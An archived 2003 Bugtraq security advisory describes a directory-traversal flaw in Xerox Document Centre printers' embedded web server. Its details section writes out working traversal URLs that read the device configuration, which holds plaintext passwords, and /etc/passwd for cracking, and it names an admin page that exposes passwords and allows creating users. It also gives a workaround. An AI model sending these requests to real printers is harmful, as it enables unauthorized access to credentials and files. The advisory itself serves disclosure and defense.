Security bug in Xerox Document Centre

From: J.A. Gutierrez (spd_at_shiva.cps.unizar.es)
Date: 12/19/03

  • Next message: Josh Camacho: "AOL Instant Messanger - Buddy Icon Warn Exploit"
    Date: Fri, 19 Dec 2003 14:16:57 +0100
    To: bugtraq@securityfocus.com
    
    

    CONTACT INFORMATION
    ===============================================================================

     Name : J.A. Gutierrez
     E-mail : spd@shiva.cps.unizar.es

     Reported this to the vendor on Mon Dec 15 2003 using feedback form
     at http://www.xerox.com, since I couldn't find a security contact.

    TECHNICAL INFO
    ===============================================================================

    Vulnerable systems
    - --------------------------------------------------------------

        Xerox Document Centre 470, 255ST and maybe others.
        Software : Xerox_MicroServer
        Version : Xerox11 0.19.5.509
        OS : LynxOS:E2.1_SMP.063.1:02/13/2003

    Impact
    - -----------------------------------------

        Remote access to files.
        Access to plaintext passwords for the http administration interface.
        Access to DES passwords for the operating system.
        Read-write access to http users and passwords

    Details
    - --------------------------------------------------------------

        Web server software (self-reports as "Xerox_MicroServer/Xerox11")
        for Xerox hardware will return a binary dump of directories when
        the requested URL ends with "/.." or "/."; so you can build easily
        the directory/file tree from document root and get every file.

        At first, you can't get back past document root, since httpd seems
        to reject "../" if it would climb back too much:

        GET /../.. -> "The request had invalid syntax."

        But it does accept "../":

        GET /assist/.. -> OK

        So maybe it just counts "../" groups and compares the count
        to the total number of "/" ? Let's try:

        GET /assist/////.././../../. -> OK

        Examples:

        - http://xerox_dc_470.example.com/..

    00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
    10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
    20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
    30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
    40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
    50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
    60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

        - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

        and you get full configuration, including plain text passwords.

        - http://xerox_dc_470.example.com////////../../../../../../etc/passwd

        and you get a passwd file to run crack on

        Even without having to use ".." you can get the plain text passwords
        for the HTTP interface using

        http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml

        From that page, you can even create new users; when you press
        "Apply new settings" button prompts for admin password (the
        same you just have read in that same page)

        Probably you could use this to steal documents from the printer
        queue, but I haven't verified this.

        Note: to test this vulnerability do not use any "smart" http client
        which will rewrite the URL internally to suppress '../' parts.

    Workaround
    - ---------------------------------------------------------------------

        - Disable http interface.
        - Restrict access permissions to trusted hosts

    ===============================================================================

    -- 
    finger spd@shiva.cps.unizar.es for PGP      /
    .mailcap tip of the day:                   /             La vida es una carcel
    application/ms-tnef; cat '%s' > /dev/null /           con las puertas abiertas
    text/x-vcard; cat '%s' > /dev/null       /            (A. Calamaro)
    

  • Next message: Josh Camacho: "AOL Instant Messanger - Buddy Icon Warn Exploit"

    Relevant Pages

    • Re: passwords in asp pages
      ... Is the site available via http or https? ... will show the passwords, it should be HTTPS. ... All of our class sizes are guaranteed to be 10 students or less to facilitate one-on-one interaction with one of our expert instructors. ... Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. ...
      (Security-Basics)
    • Re: Password Change Prompt breaks ASP.NET pages
      ... Normally for security related events you'd be seeing Access ... Denied type errors if passwords weren't synched. ... The error message is indeed an HTTP 404 File Not Found. ... :>: pushed to the web server. ...
      (microsoft.public.dotnet.framework.aspnet.security)
    • Re: Cannot POP in to SBS2003
      ... you double check those passwords and that the accounts are valid. ... POP3 and IMAP are all enabled with default protocols. ... > Not familiar with "RDP over HTTP" unles I know it as something else. ...
      (microsoft.public.windows.server.sbs)
    • Re: Apache to use FreeBSD system passwd
      ... exposed your users' login passwords to network sniffers -- including ... a coffee-shop hotspot) -- since HTTP Auth Basic passwords are sent ... See RFC 2617 "HTTP Authentication: ... from your login passwords... ...
      (comp.unix.bsd.freebsd.misc)